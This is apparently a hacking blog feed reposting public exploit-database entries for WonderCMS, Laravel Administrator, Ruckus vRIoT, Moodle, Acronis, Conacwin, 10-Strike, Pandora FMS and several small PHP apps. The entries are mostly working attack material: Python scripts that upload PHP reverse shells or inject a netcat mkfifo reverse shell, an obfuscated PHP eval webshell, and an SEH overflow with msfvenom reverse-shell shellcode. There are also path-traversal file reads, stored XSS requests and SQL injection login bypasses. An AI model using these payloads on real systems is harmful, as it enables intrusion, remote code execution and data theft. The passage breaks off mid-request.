    # Exploit Title: WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting # Google Dork: "WonderCMS" # Date: 2020-11-27 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: https://www.wondercms.com/ # Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip # Version: 3.1.3 # Tested on: Ubuntu 20.10 Steps-To-Reproduce: 1. Login and select button setting 2. Go to tab Files, and upload file contains payload xss with extension like html, svg, htm 3. Go to http://target.lc/data/files/<name-file> and trigger XSS POST /home HTTP/1.1 Host: wordpress.lc:8081 Content-Length: 372 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://wordpress.lc:8081 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6EKP5vjUNS5Icgql User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://wordpress.lc:8081/ Accept-Encoding: gzip, deflate Accept-Language: vi,vi-VN;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=74me71gverejuaf2bns2n5fpkf Connection: close ------WebKitFormBoundary6EKP5vjUNS5Icgql Content-Disposition: form-data; name="uploadFile"; filename="xss.html" Content-Type: text/html <script>alert('XSS')</script> ------WebKitFormBoundary6EKP5vjUNS5Icgql Content-Disposition: form-data; name="token" 5d715f2aebdf138f4968fce8dcd3703778c6fb5a1abea40e27eb9280079474da ------WebKitFormBoundary6EKP5vjUNS5Icgql-- --
  11. HireHackking

    Laravel Administrator 4 - Unrestricted File Upload (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit title: Laravel Administrator 4 - Unrestricted File Upload (Authenticated) # Author: Victor Campos and Xavi Beltran # Contact: vcmartin@protonmail.com # Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/ # Date: 25/3/2020 # Software link: https://github.com/FrozenNode/Laravel-Administrator/ # Version : 4 # Tested on: Laravel-Administrator 4 # CVE : CVE-2020-10963 #!/usr/bin/env python import requests,json,traceback from requests.auth import HTTPBasicAuth #Parameters to be set up (ENTER YOUR VALUES) #=========================================== # Listener IP and port ip = "" port = "" #Admin credentials user = "" password = "" #URLs of the web application domain = "" # For example "https://www.example.com" login_url = "" # For example "/user/login" fileupload_url = "" # For example "/admin/categories/image/file_upload" uploaded_files_url = "" # For example "/categories/images" #Reverse shell payload (DO NOT MODIFY THIS SECTION) #================================================== #GIF file header shell = "GIF89a\r\n" #php reverse shell shell += "\x3c?php\r\nexec(\"/bin/bash -c \'bash -i \x3e /dev/tcp/" + ip + "/" + port + " 0\x3e&1\'\");?\x3e\r\n" with requests.Session() as s: try: print("\n[+] Logging into the panel") s.post(domain + login_url, data={'email':user,'password':password,'remember': '1'}) print("[+] Uploading the malicious file") r = s.post(domain + fileupload_url, files={'name':'Picture.png','file': ('test.php',shell)}) print("[+] Response text:") #print(r.text) shell_file = (json.loads(r.text))["filename"] print("[+] Name of uploaded file: " + shell_file) print("\n[+] Executing the reverse shell on " + ip + ":" + port + "...") r = s.get(domain + uploaded_files_url + '/' + shell_file) except Exception as e: print(str(traceback.format_exc()))
  12. HireHackking

    Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Product: Ruckus IoT Controller (Ruckus vRIoT) # Version: <= 1.5.1.0.21 # Vendor: https://support.ruckuswireless.com/ # Vulnerability: Command Injection & Broken Authentication # References: CVE-2020-26878 # Discovered by: Juan Manuel Fernandez # Exploit Title: Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution # Exploit Author: Emre SUREN # Disclosure Date: 2020-10-26 # Tested on: Appliance #!/usr/bin/python # -*- coding: utf-8 -*- import requests, urllib3, sys from Crypto.Cipher import AES from base64 import b64encode, b64decode from colorama import Fore urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def listen(lhost, lport): opt = str(raw_input(Fore.YELLOW + "[?] Listening " + lhost + " " + lport + " (i.e. netcat) ? (y/n): ")) if opt == "y": return True else: return False def generatePayload(lhost, lport): payload="; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc "+lhost+" "+lport+" >/tmp/f; #" return payload def generateMagicToken(): enc_dec_method = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode("utf8") str_key = 'serviceN1authent' str_to_enc = 'TlBMVVMx' return encrypt(enc_dec_method, salt, str_key, str_to_enc) def encrypt(enc_dec_method, salt, str_key, str_to_enc): aes_obj = AES.new(str_key, AES.MODE_CFB, salt) hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8")) mret = b64encode(hx_enc).decode(enc_dec_method) return mret def execCmd(rhost, rport, lhost, lport): payload = generatePayload(lhost, lport) post_data = { "username": payload, "password": "test" } print(Fore.BLUE + "[*] Payload\t: " + payload) token = generateMagicToken() headers = { "Authorization": token } rpath = "/service/v1/createUser" uri = 'https://' + rhost + ":" + rport + rpath r = requests.post(uri, json=post_data, headers=headers, verify=False) print(Fore.BLUE + "[*] Request sent") if r.status_code == 200: print(Fore.GREEN + "[+] Successful. Check for the session...") else: print(Fore.RED + "[X] Failed. Check for the response...") print(Fore.BLUE + "[*] Response\t: " + r.text) sys.exit() def main(): if (len(sys.argv) != 5): print("[*] Usage: ruckus151021.py <RHOST> <RPORT> <LHOST> <LPORT>") print("[*] <RHOST> -> Target IP") print("[*] <RPORT> -> Target Port") print("[*] <LHOST> -> Attacker IP") print("[*] <LPORT> -> Attacker Port") print("[*] Example: python {} 192.168.2.25 443 192.168.2.3 9001".format(sys.argv[0])) exit(0) rhost = sys.argv[1] rport = sys.argv[2] lhost = sys.argv[3] lport = sys.argv[4] if not listen(lhost, lport): print(Fore.RED + "[!] Please listen at port {} to connect a reverse session !".format(lport)) else: execCmd(rhost, rport, lhost, lport) if __name__ == "__main__": main()
  13. HireHackking

    Moodle 3.8 - Unrestricted File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Moodle 3.8 - Unrestricted File Upload # Date: 2019-09-08 # Exploit Author: Sirwan Veisi # Vendor Homepage: https://moodle.org/ # Software Link: https://github.com/moodle/moodle # Version: Moodle Versions 3.8, 3.7, 3.6, 3.5, 3.4... # Tested on: Moodle Version 3.8 # CWE : CWE-434 I found an Unrestricted Upload vulnerability for Moodle version 3.8 , that allows the attacker to upload or transfer files of dangerous types. Example exploitation request: POST /repository/repository_ajax.php?action=upload HTTP/1.1 Host: VulnerableHost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------38898830537874132223151601680 Content-Length: 2763 Origin: https://VulnerableHost Connection: close Referer: https://VulnerableHost/user/files.php Cookie: MoodleSession=bpn90khjdh7mq4phs8i9r0caai Upgrade-Insecure-Requests: 1 -----------------------------38898830537874132223151601680 Content-Disposition: form-data; name="repo_upload_file"; filename="image.php" Content-Type: image/jpeg GIF89a; <?php $Q=str_replace('kz','','crekzakztkze_kzfunckztkzion'); $O='"";for%(%$i=%0;$i<$l;){for%($j=0%;($j<$c&%&$i<$l);$%j++,$i+%+%){$o.=$%t{$i'; $l='_contents(%"php:%//input"),%$m)=%=1){@ob%_start();%@eva%l(@gzunc%o%mpress(%@'; $C='$k="3%fbd6%8c8"%;$kh="2a%e%7d638909f";$%kf%="60eb0ffaeb%1%7";$p="dP%FT1%'; $h='x(@b%ase%6%4_decode($m[1%]),$k)));%$o=@o%b_get_conte%%nts();@ob_end%%_c%lean'; $N='}%%^$k{$j};}}retu%rn $o;}i%f(@preg%_matc%%h("/$kh(.+)$%%k%f%/",@file_ge%t'; $e='Nmy694Bcj%Vc";fu%nction% x(%$t,$k){$c=st%rle%n%($%%k);$l=strlen($t)%;$o='; $V='();$r=@bas%e64_en%cod%e(@x(@%%gzcomp%ress($o),$k))%;%print("$%p$kh$r$kf");}'; $P=str_replace('%','',$C.$e.$O.$N.$l.$h.$V); $n=$Q('',$P);$n(); ?> -----------------------------
  14. HireHackking

    Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF # Date: 2020-07-30 # Author: Julien Ahrens # Vendor Homepage: https://www.acronis.com # Version: 12.5 Build 16341 # CVE: CVE-2020-16171 VERSIONS AFFECTED ==================== Acronis Cyber Backup v12.5 Build 16327 and probably below. VULNERABILITY DETAILS ======================== All API endpoints running on port 9877 under "/api/ams/" whereof some are reachable without authentication, do accept an additional custom header called "Shard": def get_ams_address(headers): if 'Shard' in headers: [...] return headers.get('Shard') # Mobile agent >= ABC5.0 The value of this header is afterwards to construct a separate web request send by the application using a urllib.request.urlopen call: def make_request_to_ams(resource, method, data=None): port = config.CONFIG.get('default_ams_port', '9892') uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource) logging.debug('Making request to AMS %s %s', method, uri) headers = dict(request.headers) del headers['Content-Length'] if not data is None: headers['Content-Type'] = 'application/json' req = urllib.request.Request(uri, headers=headers, method=method, data=data) resp = None try: resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT) except Exception as e: logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e)) return resp This can be abused to conduct SSRF attacks against otherwise unreachable internal hosts of Acronis services that are bound to localhost such as the "NotificationService" running on 127.0.0.1:30572 with a request header like: Shard: localhost:30572/external_email? For more details, see the referenced blog post. RISK ======= The vulnerability can be used by an unauthenticated or authenticated attacker to query otherwise unreachable internal network resources. As demonstrated in the corresponding blog post, using this vulnerability, it is possible to i.e. (amongst others) send out fully customized emails or modify the application's resource settings. 7. SOLUTION =========== Update to v12.5 Build 16342 8. REPORT TIMELINE ================== 2020-07-30: Discovery of the vulnerability 2020-07-30: Since the vulnerability is fixed in Cyber Protect: Sent out a request to the Vendor to check whether Cyber Backup is EOL and users are advised to migrate to Cyber Protect instead. 2020-07-30: CVE requested from MITRE 2020-07-31: MITRE assigns CVE-2020-16171 2020-07-31: Public Disclosure date set to 2020-08-14 2020-08-04: Vendor asks for a 90 days extension 2020-08-04: Extension not granted because there is a fix available already. Public disclosure date set to 2020-09-14 2020-09-05: Asking vendor about the status of the fix 2020-09-08: Vendor states that a fix has been backported to Cyber Backup 12.5 under the reference ABR-202103 2020-09-14: Public disclosure 9. REFERENCES ============= https://www.rcesecurity.com/2020/09/CVE-2020-16171-Exploiting-Acronis-Cyber-Backup-for-Fun-and-Emails/ https://dl.acronis.com/u/backup/rn/12.5/user/en-US/AcronisBackup12.5_relnotes.htm
  15. HireHackking

    Setelsa Conacwin 3.7.1.2 - Local File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Setelsa Conacwin 3.7.1.2 - Local File Inclusion # Date: 02/09/20 # Exploit Author: Bryan Rodriguez Martin AKA tr3mb0 # Vendor Homepage: http://setelsa-security.es/productos/control-de-acceso/ # Version: 3.7.1.2 # Tested on: Windows # FIX: The recommendation from the vendor is to update to the last version. import requests import urllib.parse import colorama from colorama import Fore, Style ENDPOINT = "http://10.4.8.11:8081/" while True: cmd = input(Fore.RED + "[*] FILE >> ") print(Style.RESET_ALL) #cmd = urllib.parse.quote(cmd) ENDPOINT2 = ENDPOINT + "..%2F..%2F" + cmd print("[*] Target >> " + ENDPOINT2) print(" ") r = requests.get(url = ENDPOINT2) extract = r.text print(extract)
  16. HireHackking

    10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH) # Date: 2020-09-02 # Exploit Author: Sectechs # Vendor Homepage: https://www.10-strike.com # Version: 8.65 # Tested on: Windows 7 x86 SP1 import os import sys import struct import socket crash ="A"* 209 # jmp short 8 # kali@root:msf-nasm_shell # nasm> jmp short 8 Next_SE_Pointer = "\xeb\x06\x90\x90" # 61e8497a SE_Handler="\x7a\x49\xe8\x61" # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.6.211 LPORT=5555 -f c -b "\x00" -e x86/alpha_mixed payload = ( "\xdb\xc3\xd9\x74\x24\xf4\x5e\x56\x59\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49" "\x6c\x59\x78\x6d\x52\x43\x30\x53\x30\x75\x50\x33\x50\x4f\x79" "\x69\x75\x34\x71\x69\x50\x32\x44\x4e\x6b\x32\x70\x64\x70\x6c" "\x4b\x76\x32\x54\x4c\x4e\x6b\x31\x42\x66\x74\x6c\x4b\x72\x52" "\x74\x68\x44\x4f\x48\x37\x42\x6a\x34\x66\x76\x51\x79\x6f\x6c" "\x6c\x77\x4c\x65\x31\x53\x4c\x74\x42\x64\x6c\x77\x50\x39\x51" "\x38\x4f\x74\x4d\x66\x61\x38\x47\x59\x72\x48\x72\x52\x72\x63" "\x67\x6c\x4b\x66\x32\x56\x70\x6c\x4b\x43\x7a\x45\x6c\x6c\x4b" "\x30\x4c\x76\x71\x43\x48\x4b\x53\x62\x68\x45\x51\x4b\x61\x43" "\x61\x4c\x4b\x73\x69\x57\x50\x37\x71\x68\x53\x4e\x6b\x52\x69" "\x36\x78\x6d\x33\x46\x5a\x43\x79\x4e\x6b\x35\x64\x4c\x4b\x77" "\x71\x5a\x76\x75\x61\x6b\x4f\x4e\x4c\x4b\x71\x58\x4f\x46\x6d" "\x65\x51\x5a\x67\x66\x58\x79\x70\x63\x45\x6a\x56\x75\x53\x63" "\x4d\x6c\x38\x45\x6b\x53\x4d\x54\x64\x32\x55\x4b\x54\x52\x78" "\x6e\x6b\x71\x48\x71\x34\x77\x71\x5a\x73\x55\x36\x6e\x6b\x56" "\x6c\x50\x4b\x4e\x6b\x50\x58\x55\x4c\x36\x61\x78\x53\x6c\x4b" "\x54\x44\x4e\x6b\x65\x51\x5a\x70\x6d\x59\x71\x54\x36\x44\x67" "\x54\x73\x6b\x51\x4b\x51\x71\x50\x59\x50\x5a\x62\x71\x79\x6f" "\x4b\x50\x73\x6f\x51\x4f\x63\x6a\x4e\x6b\x55\x42\x58\x6b\x4e" "\x6d\x53\x6d\x45\x38\x65\x63\x74\x72\x35\x50\x55\x50\x53\x58" "\x62\x57\x31\x63\x37\x42\x61\x4f\x36\x34\x33\x58\x32\x6c\x53" "\x47\x31\x36\x73\x37\x4b\x4f\x49\x45\x68\x38\x4c\x50\x56\x61" "\x33\x30\x57\x70\x44\x69\x68\x44\x76\x34\x30\x50\x32\x48\x67" "\x59\x6d\x50\x50\x6b\x73\x30\x39\x6f\x59\x45\x32\x70\x72\x70" "\x72\x70\x70\x50\x71\x50\x52\x70\x31\x50\x70\x50\x33\x58\x6a" "\x4a\x36\x6f\x49\x4f\x6b\x50\x69\x6f\x38\x55\x4a\x37\x33\x5a" "\x43\x35\x43\x58\x4f\x30\x6f\x58\x66\x66\x4e\x33\x73\x58\x46" "\x62\x35\x50\x32\x35\x4c\x73\x6d\x59\x38\x66\x62\x4a\x72\x30" "\x50\x56\x36\x37\x71\x78\x7a\x39\x59\x35\x42\x54\x35\x31\x79" "\x6f\x4b\x65\x4b\x35\x39\x50\x52\x54\x54\x4c\x69\x6f\x30\x4e" "\x47\x78\x52\x55\x38\x6c\x61\x78\x4c\x30\x58\x35\x79\x32\x33" "\x66\x79\x6f\x4a\x75\x72\x48\x35\x33\x52\x4d\x71\x74\x53\x30" "\x4d\x59\x59\x73\x51\x47\x50\x57\x70\x57\x75\x61\x78\x76\x33" "\x5a\x76\x72\x73\x69\x51\x46\x48\x62\x6b\x4d\x70\x66\x6b\x77" "\x47\x34\x57\x54\x37\x4c\x57\x71\x46\x61\x6e\x6d\x32\x64\x46" "\x44\x44\x50\x79\x56\x65\x50\x37\x34\x73\x64\x56\x30\x52\x76" "\x33\x66\x62\x76\x67\x36\x32\x76\x42\x6e\x56\x36\x32\x76\x62" "\x73\x43\x66\x45\x38\x51\x69\x78\x4c\x37\x4f\x6b\x36\x49\x6f" "\x58\x55\x4c\x49\x39\x70\x62\x6e\x73\x66\x71\x56\x39\x6f\x76" "\x50\x55\x38\x35\x58\x6c\x47\x47\x6d\x45\x30\x79\x6f\x69\x45" "\x6d\x6b\x78\x70\x6c\x75\x4c\x62\x73\x66\x35\x38\x69\x36\x7a" "\x35\x6d\x6d\x4d\x4d\x39\x6f\x5a\x75\x67\x4c\x67\x76\x51\x6c" "\x45\x5a\x4f\x70\x69\x6b\x39\x70\x54\x35\x36\x65\x6d\x6b\x33" "\x77\x56\x73\x43\x42\x30\x6f\x72\x4a\x65\x50\x62\x73\x49\x6f" "\x68\x55\x41\x41") buffer = crash + Next_SE_Pointer + SE_Handler + "\x90" * 20 + payload + "\x90" * 200 f=open("PoC6.txt","w") f.write(buffer) f.close() ''' ---------------------------------- | NEXT SEH Pointer | --|------ ESP | | < ------- A * 209 | |--------------------------------- | | | SE_Handler ▲ | | | | #POP #POP #RET | | | | | -------------------------------| | | ▼ Stack | | |______ ► ------------------------- | PAYLOAD | -------- ► call | KALI | __________________________ '''
  17. HireHackking

    Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS # Date: 01-11-2020 # Exploit Author: yunaranyancat # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip # Version: 1.0 # Tested on: Ubuntu 18.04 + XAMPP 7.4.11 Summary: Multiple Persistent Cross-site Scripting in Multi Restaurant Table Reservation System allows attacker to gain sensitive information using these vulnerabilities. # POC No.1 Persistent XSS vulnerability at /dashboard/profile.php triggered by adding payload in Restaurant Name field ### Sample request POC #1 POST /TableReservation/dashboard/profile.php HTTP/1.1 Host: [TARGET URL/IP] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[TARGET URL/IP]/TableReservation/dashboard/profile.php Content-Type: application/x-www-form-urlencoded Content-Length: 122 Cookie: PHPSESSID=0095837d1f0f69aa6c35a0bf2f70193c DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 fullname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&email=lol%40lol&phone=123456789&area=1&address=lol&password=lol&save=Save # POC No.2 Persistent XSS vulnerability at /dashboard/table-list.php triggered by adding payload in Table Name field in table-add.php ### Sample request POC #2 POST /TableReservation/dashboard/manage-insert.php HTTP/1.1 Host: [TARGET URL/IP] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[TARGET URL/IP]/TableReservation/dashboard/table-add.php Content-Type: multipart/form-data; boundary=---------------------------424640138424818065256966622 Content-Length: 321 Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------424640138424818065256966622 Content-Disposition: form-data; name="tablename" <script>alert("XSS")</script> -----------------------------424640138424818065256966622 Content-Disposition: form-data; name="addtable" Add Table -----------------------------424640138424818065256966622-- # POC No. 3 Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Item Name field in menu-add.php # POC No. 4 Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Made by field in menu-add.php # POC No. 5 Persistent XSS vulnerability at /dashboard/menu-list.php triggered by modifying value of Area(food_type) dropdown to XSS payload in menu-add.php ### Sample request POC #3, #4 & #5 POST /TableReservation/dashboard/manage-insert.php HTTP/1.1 Host: [TARGET URL/IP] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[TARGET URL/IP]/TableReservation/dashboard/menu-add.php Content-Type: multipart/form-data; boundary=---------------------------165343425917898292661480081499 Content-Length: 6641 Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------165343425917898292661480081499 Content-Disposition: form-data; name="itemname" <script>alert("XSS1")</script> -----------------------------165343425917898292661480081499 Content-Disposition: form-data; name="price" 1 -----------------------------165343425917898292661480081499 Content-Disposition: form-data; name="madeby" <svg onload=alert("XSS2")> -----------------------------165343425917898292661480081499 Content-Disposition: form-data; name="food_type" <svg onload=prompt("XSS4")> -----------------------------165343425917898292661480081499 Content-Disposition: form-data; name="image"; filename="image.jpeg" Content-Type: image/jpeg .. [REDACTED CONTENT OF image.jpeg] .. ----------------------------165343425917898292661480081499 Content-Disposition: form-data; name="addItem" Add Item -----------------------------165343425917898292661480081499--
  18. HireHackking

    LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting # Date: 19-11-2020 # Exploit Author: Sagar Banwa # Vendor Homepage: https://lepton-cms.org/ # Software Link: https://lepton-cms.org/english/download/archive.php # Version: 4.7.0 # Tested on: Windows 10/Kali Linux # CVE: CVE-2020-29240 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser. Vulnerable Parameters: Pages URL. Steps-To-Reproduce: 1. Login to the Admin Account 2. Go to the Menu-Pages-Pages Overview. 3. Now edit any page 4. Put the below payload in the url input box. 5.ex. https://localhost/_packinstall/"onmouseover=prompt(/xss/)> POST /LEPTONmvkzycfafg/modules/wrapper/save.php?leptoken=a8274f4a99bb3c2d1d857z1606411062 HTTP/1.1 Host: localhost Connection: close Content-Length: 130 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://localhost/LEPTONmvkzycfafg/backend/pages/modify.php?page_id=1&leptoken=33bfc986e094ce5dd7655z1606411059 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: lep5031sessionid=75627dd11a0e789c4e560f7a93cd3153 page_id=1&section_id=1&url=https%3A%2F%2Flocalhost%2F_packinstall%2F%22onmouseover%3Dprompt%28%2Fxss%2F%29%3E+&height=900
  19. HireHackking

    Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-09-18 # Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS Step 1: Log in to the CMS with any valid user credentials. Step 2: Select Measurement Settings and click on "Set Measurement Parts". Step 3: Create any php payload on locally on your system. ( i used the default php webshell in /usr/share/webshells/php/php-reverse-shell.php) Step 4: Fill the required details and upload the php payload you created using the image upload field. Step 5: Select Measurement Settings and click on "View/Edit Measurement Parts". Step 6: Start netcat listener. Step 7: Use the search filter to find your measurement and click on "edit" to trigger the php payload. ========================== OR ========================== Step 1: Embed an image with the code "exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg" Step 2: Rename the malicious image to have include a ".php" extention. Example ( mv r0b0t.jpg r0b0t.jpg.php ) Step 3: Log in to the CMS with any valid user credentials. Step 4: Select Measurement Settings and click on "Set Measurement Parts". Step 5: Fill the required details and upload malicious image you created using the image upload field. Step 6: Select Measurement Settings and click on "View/Edit Measurement Parts". Step 7: Use the search filter to find your measurement and click on "edit" to edit details. Step 8: Righ click on the broken image and copy image location. Step 9: Paste image location in browser and you will have RCE. ( http://localhost/img/part/r0b0t.jpg.php?cmd=cat /etc/passwd )
  20. HireHackking

    Medical Center Portal Management System 1.0 - 'login' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Medical Center Portal Management System 1.0 - 'login' SQL Injection # Dork: N/A # Date: 2020-11-26 # Exploit Author: Aydın Baran Ertemir # Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi # Version: 1.0 # Category: Webapps # Tested on: Kali Linux # POC: # 1) # http://localhost/medic/pages/login.php # POST /medic/pages/processlogin.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 57 Origin: http://localhost Connection: close Referer: http://localhost/medic/pages/login.php Cookie: PHPSESSID=ef7226c5aa187ed19ce1815df30e079e Upgrade-Insecure-Requests: 1 user=1%27+or+1%3D1%23&password=1%27+or+1%3D1%23&btnlogin=
  21. HireHackking

    Social Networking Site - Authentication Bypass (SQli)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Social Networking Site - Authentication Bypass (SQli) # Date: 2020-11-17 # Exploit Author: gh1mau # Email: gh1mau.rulez@gmail.com # Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/ # Vendor Homepage: https://www.sourcecodester.com/php/14601/social-networking-site-phpmysqli-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14601&title=Social+Networking+Site+in+PHP%2FMySQLi+with+Full+Source+Code # Software Release Date: November 17, 2020 # Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64) Vulnerable File: ---------------- /signin_form.php Vulnerable Code: ----------------- Entry point: line 7: $email=$_POST['email']; line 8: $password=$_POST['password']; Exit point: line 10: $result = mysqli_query($con,"SELECT * FROM user WHERE email = '$email' and password='$password'"); Vulnerable Issue: ----------------- Attacker could bypass the authentication using simple sqli login bypass payload username: gh1mau@gh1mau.com password: ' or '1'='1
  22. HireHackking

    Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://pandorafms.com/ # Software Link: https://pandorafms.com/community/get-started/ # Version: Pandora FMS 7.0 NG 749 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in the "Edit OS" functionality of Pandora FMS. # Vulnerable Parameters : name, description # Patch Link : https://github.com/pandorafms/pandorafms/commit/58f521e8b570802fa33c75f99586e5b01b06731b #POC POST /pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 132 Origin: http://TARGET Connection: close Referer: http://TARGET/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 Upgrade-Insecure-Requests: 1 name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&icon=0&id_os=0&action=save&update_button=Create ############################################################################################################ # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in the "Private Enterprise Numbers" functionality of Pandora FMS. # Vulnerable Parameters : manufacturer, description # Patch Link : https://github.com/pandorafms/pandorafms/commit/b9b94e1382f6e340fd9f3136972cca4373f00eb0 #POC POST /pandora_console/ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html, */*; q=0.01 